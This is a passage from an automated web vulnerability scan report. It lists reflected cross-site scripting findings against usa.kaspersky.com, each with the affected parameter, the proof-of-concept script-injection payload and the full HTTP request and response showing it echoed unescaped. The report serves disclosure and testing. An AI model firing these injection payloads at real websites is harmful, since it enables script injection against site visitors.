Referer: http://usa.kaspersky.com/products-servicesdbd00%22-alert(document.location)-%229a65bf5e617/home-computer-security/one?ICID=INT1674070
Cookie: s_nr=1315139281476-New; __utma=205612169.840720245.1315139229.1315139229.1315139229.1; __utmz=205612169.1315139229.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_vi=[CS]v1|2731B73B85012EFC-40000107200595CE[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 17:16:16 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319390176"
Content-Type: text/html; charset=utf-8
Content-Length: 30771
Date: Sun, 23 Oct 2011 17:16:22 GMT
X-Varnish: 1652697279
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/modules/search8b116"-alert(1)-"ce9764fe5ac/search.css?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.35. http://usa.kaspersky.com/products-services/home-computer-security/one [ICID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/one

Issue detail

The value of the ICID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1bc1"><script>alert(1)</script>87e5638e6e6 was submitted in the ICID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security/one?ICID=INT1674070f1bc1"><script>alert(1)</script>87e5638e6e6 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:34:53 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387693"
Content-Type: text/html; charset=utf-8
Content-Length: 78529
Date: Sun, 23 Oct 2011 16:35:28 GMT
X-Varnish: 1652562249
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070f1bc1"><script>alert(1)</script>87e5638e6e6" />
...[SNIP]...

1.36. http://usa.kaspersky.com/products-services/home-computer-security/one [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/one

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbd00"-alert(1)-"9a65bf5e617 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-servicesdbd00"-alert(1)-"9a65bf5e617/home-computer-security/one?ICID=INT1674070 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:36:27 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387787"
Content-Type: text/html; charset=utf-8
Content-Length: 41002
Date: Sun, 23 Oct 2011 16:36:31 GMT
X-Varnish: 1652567491
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
rop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-servicesdbd00"-alert(1)-"9a65bf5e617/home-computer-security/one?ICID=INT1674070";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.37. http://usa.kaspersky.com/products-services/home-computer-security/one [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/one

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8eccc"><script>alert(1)</script>43dd8730ca1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services8eccc"><script>alert(1)</script>43dd8730ca1/home-computer-security/one?ICID=INT1674070 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:36:00 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387760"
Content-Type: text/html; charset=utf-8
Content-Length: 40409
Date: Sun, 23 Oct 2011 16:36:09 GMT
X-Varnish: 1652566221
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services8eccc"><script>alert(1)</script>43dd8730ca1/home-computer-security/one?ICID=INT1674070" />
...[SNIP]...

1.38. http://usa.kaspersky.com/products-services/home-computer-security/one [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/one

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2132c"-alert(1)-"b25a63ae213 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-services/home-computer-security2132c"-alert(1)-"b25a63ae213/one?ICID=INT1674070 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:37:10 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387830"
Content-Type: text/html; charset=utf-8
Content-Length: 40959
Date: Sun, 23 Oct 2011 16:37:13 GMT
X-Varnish: 1652569676
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/home-computer-security2132c"-alert(1)-"b25a63ae213/one?ICID=INT1674070";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.39. http://usa.kaspersky.com/products-services/home-computer-security/one [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/one

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5069"><script>alert(1)</script>a473c0fcddb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-securityc5069"><script>alert(1)</script>a473c0fcddb/one?ICID=INT1674070 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:36:50 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387810"
Content-Type: text/html; charset=utf-8
Content-Length: 39454
Date: Sun, 23 Oct 2011 16:36:55 GMT
X-Varnish: 1652568778
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-securityc5069"><script>alert(1)</script>a473c0fcddb/one?ICID=INT1674070" />
...[SNIP]...

1.40. http://usa.kaspersky.com/products-services/home-computer-security/one [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/one

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8599"><script>alert(1)</script>f8f7fc35135 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security/onec8599"><script>alert(1)</script>f8f7fc35135?ICID=INT1674070 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:37:31 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387851"
Content-Type: text/html; charset=utf-8
Content-Length: 40220
Date: Sun, 23 Oct 2011 16:37:34 GMT
X-Varnish: 1652570768
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/onec8599"><script>alert(1)</script>f8f7fc35135?ICID=INT1674070" />
...[SNIP]...

1.41. http://usa.kaspersky.com/products-services/home-computer-security/one [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/one

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b67bb"-alert(1)-"5f681d3f7a7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-services/home-computer-security/oneb67bb"-alert(1)-"5f681d3f7a7?ICID=INT1674070 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:37:43 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387863"
Content-Type: text/html; charset=utf-8
Content-Length: 40966
Date: Sun, 23 Oct 2011 16:37:49 GMT
X-Varnish: 1652571491
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
geName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/home-computer-security/oneb67bb"-alert(1)-"5f681d3f7a7?ICID=INT1674070";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.42. http://usa.kaspersky.com/products-services/home-computer-security/one [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/one

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66a39"><script>alert(1)</script>f687e1ff6b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security/one?ICID=INT1674070&66a39"><script>alert(1)</script>f687e1ff6b2=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:35:40 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387740"
Content-Type: text/html; charset=utf-8
Content-Length: 78540
Date: Sun, 23 Oct 2011 16:35:51 GMT
X-Varnish: 1652565254
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070&66a39"><script>alert(1)</script>f687e1ff6b2=1" />
...[SNIP]...

1.43. http://usa.kaspersky.com/products-servicesdbd00%22-alert(document.location)-%229a65bf5e617/home-computer-security/one [ICID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-servicesdbd00%22-alert(document.location)-%229a65bf5e617/home-computer-security/one

Issue detail

The value of the ICID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4b13"><script>alert(1)</script>d889b6155ed was submitted in the ICID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-servicesdbd00%22-alert(document.location)-%229a65bf5e617/home-computer-security/one?ICID=INT1674070d4b13"><script>alert(1)</script>d889b6155ed HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/products-servicesdbd00%22-alert(document.location)-%229a65bf5e617/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; s_cc=true; intcamp=INT1674070; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_nr=1319387576026-New; s_sq=kaspersky-usa%3D%2526pid%253DProducts%252520%252526%252520Services%252520%25257C%252520Personal%252520%252526%252520Family%252520Security%252520%25257C%252520ONE%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.digitalriver.com%25252Fstore%25252Fkasperus%25252Fen_US%25252Fbuy%25252FproductID.237386700%25252F%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 17:15:51 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319390151"
Content-Type: text/html; charset=utf-8
Content-Length: 40935
Date: Sun, 23 Oct 2011 17:15:54 GMT
X-Varnish: 1652695966
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-servicesdbd00%22-alert(document.location)-%229a65bf5e617/home-computer-security/one?ICID=INT1674070d4b13"><script>alert(1)</script>d889b6155ed" />
...[SNIP]...

1.44. http://usa.kaspersky.com/products-servicesdbd00%22-alert(document.location)-%229a65bf5e617/home-computer-security/one [ICID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-servicesdbd00%22-alert(document.location)-%229a65bf5e617/home-computer-security/one

Issue detail

The value of the ICID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df090"-alert(1)-"e41734eef87 was submitted in the ICID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /products-servicesdbd00%22-alert(document.location)-%229a65bf5e617/home-computer-security/one?ICID=INT1674070df090"-alert(1)-"e41734eef87 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/products-servicesdbd00%22-alert(document.location)-%229a65bf5e617/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; s_cc=true; intcamp=INT1674070; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_nr=1319387576026-New; s_sq=kaspersky-usa%3D%2526pid%253DProducts%252520%252526%252520Services%252520%25257C%252520Personal%252520%252526%252520Family%252520Security%252520%25257C%252520ONE%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.digitalriver.com%25252Fstore%25252Fkasperus%25252Fen_US%25252Fbuy%25252FproductID.237386700%25252F%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 17:16:23 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319390183"
Content-Type: text/html; charset=utf-8
Content-Length: 40780
Date: Sun, 23 Oct 2011 17:16:28 GMT
X-Varnish: 1652697653
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...

s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-servicesdbd00%22-alert(document.location)-%229a65bf5e617/home-computer-security/one?ICID=INT1674070df090"-alert(1)-"e41734eef87";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.45. http://usa.kaspersky.com/sites/default/files/kaspersky_usatheme_favicon.ico [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/default/files/kaspersky_usatheme_favicon.ico

Issue detail

